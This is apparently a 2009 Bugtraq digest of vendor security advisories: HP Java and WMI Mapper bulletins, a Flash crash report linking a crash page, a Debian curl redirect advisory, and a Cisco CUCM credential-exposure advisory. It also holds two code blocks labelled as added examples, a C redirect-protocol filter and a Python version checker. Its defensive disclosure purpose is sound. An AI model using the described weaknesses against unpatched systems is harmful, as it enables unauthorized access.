SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier 
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier 
HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or earlier 

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================
Reference         Base Vector                      Base Score
CVE-2008-2086     (AV:N/AC:M/Au:N/C:C/I:C/A:C)      9.3
CVE-2008-5339     (AV:N/AC:L/Au:N/C:N/I:N/A:P)      5.0
CVE-2008-5340     (AV:N/AC:L/Au:N/C:C/I:C/A:C)     10.0
CVE-2008-5341     (AV:N/AC:L/Au:N/C:P/I:N/A:N)      5.0
CVE-2008-5342     (AV:N/AC:L/Au:N/C:P/I:N/A:N)      5.0
CVE-2008-5343     (AV:N/AC:L/Au:N/C:C/I:P/A:P)      9.0
CVE-2008-5344     (AV:N/AC:L/Au:N/C:P/I:P/A:P)      7.5
CVE-2008-5345     (AV:N/AC:L/Au:N/C:P/I:P/A:P)      7.5
CVE-2008-5347     (AV:N/AC:L/Au:N/C:P/I:P/A:P)      7.5
CVE-2008-5348     (AV:N/AC:M/Au:N/C:N/I:N/A:C)      7.1
CVE-2008-5350     (AV:N/AC:L/Au:N/C:P/I:N/A:N)      5.0
CVE-2008-5351     (AV:N/AC:L/Au:N/C:P/I:P/A:P)      7.5
CVE-2008-5353     (AV:N/AC:L/Au:N/C:C/I:C/A:C)     10.0
CVE-2008-5354     (AV:N/AC:M/Au:N/C:C/I:C/A:C)      9.3
CVE-2008-5356     (AV:N/AC:M/Au:N/C:C/I:C/A:C)      9.3
CVE-2008-5357     (AV:N/AC:M/Au:N/C:C/I:C/A:C)      9.3
CVE-2008-5358     (AV:N/AC:M/Au:N/C:C/I:C/A:C)      9.3
CVE-2008-5359     (AV:N/AC:M/Au:N/C:C/I:C/A:C)      9.3
CVE-2008-5360     (AV:N/AC:L/Au:N/C:P/I:P/A:N)      6.4
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following upgrades to resolve these vulnerabilities.
The upgrades are available from the following location:

http://www.hp.com/go/java 

HP-UX B.11.31
 JDK and JRE v6.0.03 or subsequent
 JDK and JRE v5.0.15 or subsequent
 SDK and JRE v1.4.2.21 or subsequent
 
HP-UX B.11.23
 JDK and JRE v6.0.03 or subsequent 
 JDK and JRE v5.0.15 or subsequent
 SDK and JRE v1.4.2.21 or subsequent
 
HP-UX B.11.11
 JDK and JRE v6.0.03 or subsequent
 JDK and JRE v5.0.15 or subsequent
 SDK and JRE v1.4.2.21 or subsequent
 

MANUAL ACTIONS: Yes - Update 
For Java v6.0.02 and earlier, update to Java v6.0.03 or subsequent. 
For Java v5.0.14 and earlier, update to Java v5.0.15 or subsequent. 
For Java v1.4.2.20 and earlier, update to Java v1.4.2.21 or subsequent. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 

The following text is for use by the HP-UX Software Assistant. 

AFFECTED VERSIONS 
HP-UX B.11.11 
HP-UX B.11.23 
HP-UX B.11.31 
==========
Jdk14.JDK14-COM
Jdk14.JDK14-IPF32 
Jdk14.JDK14-IPF64 
Jdk14.JDK14-PA11 
Jdk14.JDK14-PA20 
Jdk14.JDK14-PA20W 
Jre14.JRE14-COM 
Jre14.JRE14-IPF32 
Jre14.JRE14-IPF32-HS 
Jre14.JRE14-IPF64 
Jre14.JRE14-IPF64-HS 
Jre14.JRE14-PA11 
Jre14.JRE14-PA11-HS 
Jre14.JRE14-PA20 
Jre14.JRE14-PA20-HS 
Jre14.JRE14-PA20W 
Jre14.JRE14-PA20W-HS 
action: install revision 1.4.2.21.00 or subsequent 

Jdk15.JDK15-COM 
Jdk15.JDK15-PA20 
Jdk15.JDK15-PA20W 
Jdk15.JDK15-IPF32 
Jdk15.JDK15-IPF64 
Jre15.JRE15-COM 
Jre15.JRE15-PA20 
Jre15.JRE15-PA20-HS 
Jre15.JRE15-PA20W 
Jre15.JRE15-PA20W-HS 
Jre15.JRE15-IPF32 
Jre15.JRE15-IPF32-HS 
Jre15.JRE15-IPF64 
Jre15.JRE15-IPF64-HS 
action: install revision 1.5.0.15.00 or subsequent 

Jdk60.JDK60-COM 
Jdk60.JDK60-PA20 
Jdk60.JDK60-PA20W 
Jdk60.JDK60-IPF32 
Jdk60.JDK60-IPF64 
Jre60.JRE60-COM 
Jre60.JRE60-IPF32 
Jre60.JRE60-IPF32-HS 
Jre60.JRE60-IPF64 
Jre60.JRE60-IPF64-HS 
Jre60.JRE60-PA20 
Jre60.JRE60-PA20-HS 
Jre60.JRE60-PA20W 
Jre60.JRE60-PA20W-HS 
action: install revision 1.6.0.03.00 or subsequent 

END AFFECTED VERSIONS 

HISTORY 
Version:1 (rev.1) 9 March 2009 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 


Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

© Copyright 2009 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSbZgP+AfOvwtKn1ZEQLqWgCgpK0tTDWGRJkDVpWzhFqI3asVAsMAnjKq
R3jvTn4bcr1e7cmNVRj6zNp+
=8OKZ
-----END PGP SIGNATURE-----

To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02412 SSRT080040 rev.1 - WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access
Date: Wed, 11 Mar 2009 08:20:07 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090311152008.4454FBF78@hpchs.cup.hp.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01655638
Version: 1

HPSBMA02412 SSRT080040 rev.1 - WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-03-09
Last Updated: 2009-03-09

Potential Security Impact: Remote unauthorized access to data, local unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with WMI Mapper for HP Systems Insight Manager running on Windows. The vulnerabilities could be exploited remotely to allow unauthorized access to data or locally to gain unauthorized access.

References: CVE-2009-0712, CVE-2009-0713

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
WMI Mapper for HP Systems Insight Manager prior to v2.5.2.0

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================
Reference         Base Vector                      Base Score
CVE-2009-0712     (AV:L/AC:L/Au:S/C:C/I:C/A:N)      6.2
CVE-2009-0713     (AV:N/AC:L/Au:N/C:P/I:N/A:N)      5.0
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
 
RESOLUTION

HP has provided the following software patch to resolve the vulnerability. 

The patch can be downloaded from http://www.hp.com/bizsupport/ 

WMIMapper2_6_0.msi or subsequent
 

PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 9 March 2009 Initial release 

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSbUbhuAfOvwtKn1ZEQJkFwCdHGcxKKJ05owJj9iPwE0yXFZrNqMAn2Bu
wmU0rQ9+y4JnT3C3/Joa2cBr
=pfZN
-----END PGP SIGNATURE-----

Date: Wed, 11 Mar 2009 10:30:49 -0700
Message-ID: <f1dcfaef0903111030y5aefdb48o218689a260adbee6@mail.gmail.com>
Subject: Re: Adobe Flash Player plug-in null pointer dereference and browser crash
From: Matthew Dempsky <matthew@mochimedia.com>
To: bugtraq@securityfocus.com

On Wed, Oct 1, 2008 at 5:46 PM, Matthew Dempsky <matthew@mochimedia.com> wrote:
> If a Flash 9 SWF loads two SWF files with different SWF version
> numbers from two distinct HTTP requests to the exact same URL
> (including query string arguments), then Adobe's Flash Player plug-in
> will try to dereference a null pointer.  This issue affects at least
> versions 9.0.45.0, 9.0.112.0, 9.0.124.0, and 10.0.12.10 on Windows, OS
> X, and Linux.

As an update, this issue also affects 10.0.22.87 at least on Windows
and OS X.  I've seen some Linux distributions (e.g., [1]) claim that
10.0.22.87 fixes this bug (aka CVE-2008-4546), but I think this is
mistaken.

You can easily reproduce this bug (i.e., crash your browser) by
visiting http://flashcrash.dempsky.org/.  Be sure to tell your
friends: it can be the next Rick Roll.

[1] http://www.gentoo.org/security/en/glsa/glsa-200903-23.xml?style=printable

-- 
Matthew Dempsky
http://www.mochimedia.com

Date: Wed, 11 Mar 2009 17:46:54 +0100
From: Nico Golde <nion@debian.org>
Message-ID: <20090311164654.GB23703@ngolde.de>
Subject: [SECURITY] [DSA 1738-1] New curl packages fix arbitrary file access
To: bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA-1738-1                    security@debian.org
http://www.debian.org/security/                                 Nico Golde
March 11th, 2009                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : curl
Vulnerability  : arbitrary file access
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2009-0037
Debian Bug     : 518423
BugTraq ID     : 33962

David Kierznowski discovered that libcurl, a multi-protocol file transfer
library, when configured to follow URL redirects automatically, does not
question the new target location.  As libcurl also supports file:// and
scp:// URLs - depending on the setup - an untrusted server could use that
to expose local files, overwrite local files or even execute arbitrary
code via a malicious URL redirect.

This update introduces a new option called CURLOPT_REDIR_PROTOCOLS which by
default does not include the scp and file protocol handlers.
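
The redirect protocol restriction described above, modelled as an added example (not code from the advisory, from Debian or from libcurl): each Location value is checked against a protocol mask before it is followed, and a relative redirect inherits the protocol of the URL that issued it. The PROTO_* bits, the function names and the sample URLs are assumptions constructed for this illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Protocol bits for this example only; they are not libcurl's CURLPROTO_* values. */
#define PROTO_HTTP  (1u << 0)
#define PROTO_HTTPS (1u << 1)
#define PROTO_FTP   (1u << 2)
#define PROTO_SCP   (1u << 3)
#define PROTO_FILE  (1u << 4)
#define PROTO_ALL   (PROTO_HTTP | PROTO_HTTPS | PROTO_FTP | PROTO_SCP | PROTO_FILE)
/* Default described in the advisory: redirects may not switch to scp or file. */
#define REDIR_DEFAULT (PROTO_ALL & ~(PROTO_SCP | PROTO_FILE))

static const struct { const char *name; unsigned bit; } KNOWN[] = {
    {"http", PROTO_HTTP}, {"https", PROTO_HTTPS}, {"ftp", PROTO_FTP},
    {"scp", PROTO_SCP}, {"file", PROTO_FILE}
};

/* Constructed sample: Location values as a server might send them, in order. */
static const char *const SAMPLE_CHAIN[] = {
    "/login?next=/report",              /* relative: stays on the current protocol */
    "https://cdn.example.test/report",  /* absolute, permitted protocol */
    "FILE:///path/to/local/file"        /* protocol switch to a local file */
};

static const char *skip_ws(const char *s)
{
    while (*s == ' ' || *s == '\t') s++;
    return s;
}

/* Length of a leading URL scheme (RFC 3986: ALPHA *(ALPHA / DIGIT / "+" / "-" / ".")
   followed by ':'), or 0 when the reference is relative. */
static size_t scheme_len(const char *s)
{
    size_t n = 0;
    if (!isalpha((unsigned char)s[0])) return 0;
    while (isalnum((unsigned char)s[n]) || s[n] == '+' || s[n] == '-' || s[n] == '.') n++;
    return s[n] == ':' ? n : 0;
}

/* Bit for a scheme of length n, compared case-insensitively; 0 if unknown. */
static unsigned scheme_bit(const char *s, size_t n)
{
    size_t i, j;
    for (i = 0; i < sizeof KNOWN / sizeof KNOWN[0]; i++) {
        if (strlen(KNOWN[i].name) != n) continue;
        for (j = 0; j < n && tolower((unsigned char)s[j]) == KNOWN[i].name[j]; j++) {}
        if (j == n) return KNOWN[i].bit;
    }
    return 0;
}

/* Protocol a redirect would use. A relative Location inherits the protocol
   of the URL that issued it. */
unsigned redirect_protocol(const char *current_url, const char *location)
{
    const char *target = skip_ws(location);
    size_t n = scheme_len(target);
    if (n == 0) {
        target = skip_ws(current_url);
        n = scheme_len(target);
    }
    return n ? scheme_bit(target, n) : 0;
}

/* 1 if the hop may be followed under redir_mask; unknown protocols fail closed. */
int redirect_allowed(const char *current_url, const char *location, unsigned redir_mask)
{
    return (redirect_protocol(current_url, location) & redir_mask) != 0;
}

/* Index of the first hop the mask refuses, or -1 if the whole chain is permitted. */
int first_blocked_hop(const char *start_url, const char *const *locations,
                      size_t count, unsigned redir_mask)
{
    const char *current = start_url;
    size_t i;
    for (i = 0; i < count; i++) {
        if (!redirect_allowed(current, locations[i], redir_mask)) return (int)i;
        /* Only an absolute Location changes the protocol for later relative hops. */
        if (scheme_len(skip_ws(locations[i])) != 0) current = locations[i];
    }
    return -1;
}

int main(void)
{
    const char *start = "http://app.example.test/";  /* constructed starting URL */
    printf("default redirect mask: first blocked hop = %d\n",
           first_blocked_hop(start, SAMPLE_CHAIN, 3, REDIR_DEFAULT));
    printf("no restriction:        first blocked hop = %d\n",
           first_blocked_hop(start, SAMPLE_CHAIN, 3, PROTO_ALL));
    return 0;
}
```

In an application that links a fixed libcurl, the same restriction is one call next to CURLOPT_FOLLOWLOCATION: curl_easy_setopt(handle, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS).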


For the oldstable distribution (etch) this problem has been fixed in
version 7.15.5-1etch2.

For the stable distribution (lenny) this problem has been fixed in
version 7.18.2-8lenny2.

For the unstable distribution (sid) this problem has been fixed in
version 7.18.2-8.1.

We recommend that you upgrade your curl packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkm36v4ACgkQHYflSXNkfP/PaQCfe6xmnRhMoAmhLaEsVrOEwCD2
OKIAoKxDcy9wTjQb4jLMoZ1tAqSuS9jr
=eSVR
-----END PGP SIGNATURE-----

From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco Unified Communications Manager IP Phone Personal Address Book Synchronizer Privilege Escalation Vulnerability
Date: Wednesday, 11 March 2009 10:40:00 -0500 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Unified Communications Manager IP
Phone Personal Address Book Synchronizer Privilege Escalation
Vulnerability

Advisory ID: cisco-sa-20090311-cucmpab

Revision 1.0

For Public Release 2009 March 11 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
======
Cisco Unified Communications Manager, formerly CallManager, contains
a privilege escalation vulnerability in the IP Phone Personal Address
Book (PAB) Synchronizer feature that may allow an attacker to gain
complete administrative access to a vulnerable Cisco Unified
Communications Manager system. If Cisco Unified Communications
Manager is integrated with an external directory service, it may be
possible for an attacker to leverage the privilege escalation
vulnerability to gain access to additional systems configured to use
the directory service for authentication.

Cisco has released free software updates that address this
vulnerability. Workarounds that mitigate this vulnerability are
available.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20090311-cucmpab.shtml

Affected Products
================
Vulnerable Products
+------------------

The following products are vulnerable:

  * Cisco Unified CallManager 4.1 versions
  * Cisco Unified Communications Manager 4.2 versions prior to 4.2(3)SR4b
  * Cisco Unified Communications Manager 4.3 versions prior to 4.3(2)SR1b
  * Cisco Unified Communications Manager 5.x versions prior to 5.1(3e)
  * Cisco Unified Communications Manager 6.x versions prior to 6.1(3)
  * Cisco Unified Communications Manager 7.0 versions prior to 7.0(2)

Administrators of systems that are running Cisco Unified
Communications Manager software version 4.x can determine the
software version by navigating to Help > About Cisco Unified
CallManager and selecting the Details button via the Cisco Unified
Communications Manager administration interface.

Administrators of systems that are running Cisco Unified
Communications Manager software versions 5.x, 6.x, and 7.x can
determine the software version by viewing the main page of the Cisco
Unified Communications Manager administration interface. The software
version can also be determined by running the command show version
active via the command line interface (CLI).
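
The affected-version list above can be turned into a triage check. The following Python is an added example, not part of Cisco's advisory: it assumes the version is supplied in the parenthesised notation the advisory uses, and the ordering rule for letter suffixes and service releases is an assumption stated in the code.

```python
import re

# Fixed releases, copied from the advisory's "Vulnerable Products" list.
# Key is a (major, minor) train, or (major, None) for "5.x" / "6.x".
FIXED_RELEASE = {
    (4, 2): "4.2(3)SR4b",
    (4, 3): "4.3(2)SR1b",
    (5, None): "5.1(3e)",
    (6, None): "6.1(3)",
    (7, 0): "7.0(2)",
}

VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)"              # major.minor, e.g. 4.2
    r"(?:\((\d+)([a-z]?)\))?"     # maintenance release, e.g. (3) or (3e)
    r"(?:SR(\d+)([a-z]?))?$",     # service release, e.g. SR4b
    re.IGNORECASE,
)


def parse_version(text):
    """Turn '4.2(3)SR4b' into a tuple that sorts in release order.

    Assumption (not stated in the advisory): letter suffixes sort
    alphabetically, and a release without a suffix or service release
    precedes one that has it.
    """
    match = VERSION_RE.match("".join(text.split()))
    if match is None:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, maint, maint_letter, sr, sr_letter = match.groups()
    return (
        int(major), int(minor),
        int(maint or 0), (maint_letter or "").lower(),
        int(sr or 0), (sr_letter or "").lower(),
    )


def assess(version):
    """Return 'vulnerable', 'fixed' or 'not listed' for one version string."""
    parsed = parse_version(version)
    major, minor = parsed[0], parsed[1]
    if (major, minor) == (4, 1):
        # All 4.1 versions are listed as vulnerable; the advisory's fix
        # for them is an upgrade to 4.2(3)SR4b.
        return "vulnerable"
    fixed = FIXED_RELEASE.get((major, minor)) or FIXED_RELEASE.get((major, None))
    if fixed is None:
        return "not listed"  # train does not appear in the advisory
    return "vulnerable" if parsed < parse_version(fixed) else "fixed"


if __name__ == "__main__":
    # Constructed inventory of version strings for illustration.
    for v in ["4.1(3)SR8", "4.2(3)SR4a", "4.3(2)SR1b", "5.1(3d)", "6.1(3)", "7.1(2)"]:
        print(f"{v:12} {assess(v)}")
```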

Products Confirmed Not Vulnerable
+--------------------------------

Cisco Unified Communications Manager Express is not affected by this
vulnerability. No other Cisco products are currently known to be
affected by this vulnerability.

Details
======
The Cisco IP Phone Personal Address Book (PAB) Synchronizer feature
of Cisco Unified Communications Manager allows users to keep their
Cisco Unified Communications Manager address book synchronized with
their Microsoft Windows address book. The IP Phone PAB Synchronizer
feature contains a privilege escalation vulnerability that may allow
an attacker to obtain complete administrative access to a vulnerable
Cisco Unified Communications Manager system. After an IP Phone PAB
Synchronizer client successfully authenticates to a Cisco Unified
Communications Manager device over an HTTPS connection, the Cisco
Unified Communications Manager returns credentials for a user account
that is used to manage the Cisco Unified Communications Manager
directory service. If an attacker is able to intercept the
credentials, they can perform unauthorized modifications to the Cisco
Unified Communications Manager configuration and extend their
privileges. The IP Phone PAB Synchronizer client has been redesigned
to allow address book synchronization without requiring the directory
service credentials. This vulnerability does not allow an attacker to
gain access to the underlying platform operating system of any Cisco
Unified Communications Manager system.

Cisco Unified Communications Manager 4.x
+---------------------------------------

Cisco Unified Communications Manager software version 4.x by default
stores user information using an internal Lightweight Directory
Access Protocol (LDAP) server called DC Directory. After an IP Phone
PAB Synchronizer client successfully authenticates, the Cisco Unified
Communications Manager returns credentials for the DC Directory user
that will be used by the client to synchronize a user's address book.
Depending on how a Cisco Unified Communications Manager is
configured, an attacker may obtain different privilege levels using
the intercepted credentials.

By default, Cisco Unified Communications Manager software version 4.x
administrator accounts are created as part of an underlying Microsoft
Windows operating system. Cisco Unified Communications Manager is
commonly deployed using the Multi-Level Administration (MLA) feature
to ease the integration of Cisco Unified Communications Manager into
enterprise environments. If MLA is enabled, Cisco Unified
Communications Manager stores administrator accounts in the Cisco
Unified Communications Manager DC Directory service. If an attacker
obtains the DC Directory credentials and MLA is enabled, the attacker
can add an existing account to the Cisco Unified Communications
Manager super-user group. The attacker can then access the Cisco
Unified Communications Manager management interface with complete
administrative access. If MLA is not enabled, the attacker cannot
escalate their privileges; however, they can modify any user settings
in the directory.

The Cisco Unified Communications Manager 4.x IP Phone PAB
Synchronizer client uses an unencrypted LDAP connection to perform
address book synchronization. The DC Directory credentials are passed
in the clear over the network and are vulnerable to being sniffed by
an attacker. If using the DC Directory internal LDAP server, the IP
Phone PAB Synchronizer client communicates to Cisco Unified
Communications Manager on TCP ports 8404 and 8405.

Cisco Unified Communications Manager 5.x, 6.x, 7.x
+-------------------------------------------------

Cisco Unified Communications Manager software versions 5.x, 6.x, and
7.x store user information as a part of the internal Cisco Unified
Communications Manager configuration database. The IP Phone PAB
Synchronizer client uses the AXL application programming interface
(API) to perform address book synchronization. After a client
successfully authenticates, the Cisco Unified Communications Manager
returns credentials for a database user account named TabSyncSysUser
that will be used by the client to synchronize a user's address
book. The TabSyncSysUser account has full read and write privileges
to the Cisco Unified Communications Manager configuration database.
Using the TabSyncSysUser credentials via the AXL API, an attacker can
modify any parameter in the database including creating new
administrator accounts.

Directory Service Integration
+----------------------------

Cisco Unified Communications Manager software versions 4.x, 5.x, 6.x,
and 7.x can be integrated with Microsoft Active Directory and several
non-Microsoft LDAP servers to perform user authentication. In order
to function properly, the integration process requires that
appropriate user credentials for the directory service are provided
to Cisco Unified Communications Manager. If an attacker intercepts or
sniffs the directory service credentials returned by a Cisco Unified
Communications Manager responding to an IP Phone PAB Synchronizer
client, the attacker may be able to leverage the credentials to gain
access to additional systems configured to use the directory service
for authentication.

Administrators should ensure that any directory service credentials
used for the Cisco Unified Communications Manager integration process
are configured to follow the principle of least privilege. The
credentials should be configured with only the privileges necessary
to access the directory service data needed for the integration
process to function properly. The use of overly privileged
administrator accounts is discouraged. Please see the Workarounds
section for more information on performing the integration of Cisco
Unified Communications Manager with AD using the least privilege
concept.

This vulnerability is documented in Cisco Bug IDs CSCso76587 and
CSCso78528 and has been assigned Common Vulnerabilities and Exposures
(CVE) identifier CVE-2009-0632.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

CSCso76587 - Directory Manager password sent in clear from client

CVSS Base Score - 9

Access Vector           - Network
Access Complexity       - Low
Authentication          - Single
Confidentiality Impact  - Complete
Integrity Impact        - Complete
Availability Impact     - Complete

CVSS Temporal Score - 7.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

CSCso78528 - TabSyncSysUser (axl user) password sent in clear from client

CVSS Base Score - 9

Access Vector           - Network
Access Complexity       - Low
Authentication          - Single
Confidentiality Impact  - Complete
Integrity Impact        - Complete
Availability Impact     - Complete

CVSS Temporal Score - 7.4

Exploitability          - Functional
Remediation Level       - Official-Fix
Report Confidence       - Confirmed

Impact
=====
Successful exploitation of this vulnerability may allow an attacker
to intercept user credentials that allow the attacker to escalate
their privilege level and obtain complete administrative access to a
vulnerable Cisco Unified Communications Manager system. If integrated
with an external directory service, the intercepted user credentials
may allow an attacker to gain access to additional systems configured
to use the directory service for authentication.

Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Cisco Unified Communications Manager software version 4.2(3)SR4b
contains the fix for this vulnerability. Administrators of Cisco
Unified CallManager software version 4.1 systems are encouraged to
upgrade to Cisco Unified Communications Manager software version
4.2(3)SR4b in order to obtain fixed software. Version 4.2(3)SR4b can
be downloaded at the following link:

http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid=280264388&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20CallManager%20Version%204.2&isPlatform=N&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N

Cisco Unified Communications Manager software version 4.3(2)SR1b
contains the fix for this vulnerability. Version 4.3(2)SR1b can be
downloaded at the following link:

http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid=280771554&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%204.3&isPlatform=N&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N

Cisco Unified Communications Manager software version 5.1(3e)
contains the fix for this vulnerability. Version 5.1(3e) can be
downloaded at the following link:

http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=null&isPlatform=Y&mdfid=280735907&sftType=Unified%20Communications%20Manager%20Updates&treeName=Voice%20and%20Unified%20Communications&modelName=Cisco%20Unified%20Communications%20Manager%20Version%205.1&mdfLevel=Software%20Version/Option&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N

Cisco Unified Communications Manager software version 6.1(3) contains
the fix for this vulnerability. Version 6.1(3) can be downloaded at
the following link:

http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid=281023410&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%206.1&isPlatform=N&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N

Cisco Unified Communications Manager software version 7.0(2) contains
the fix for this vulnerability. Version 7.0(2) can be downloaded at
the following link:

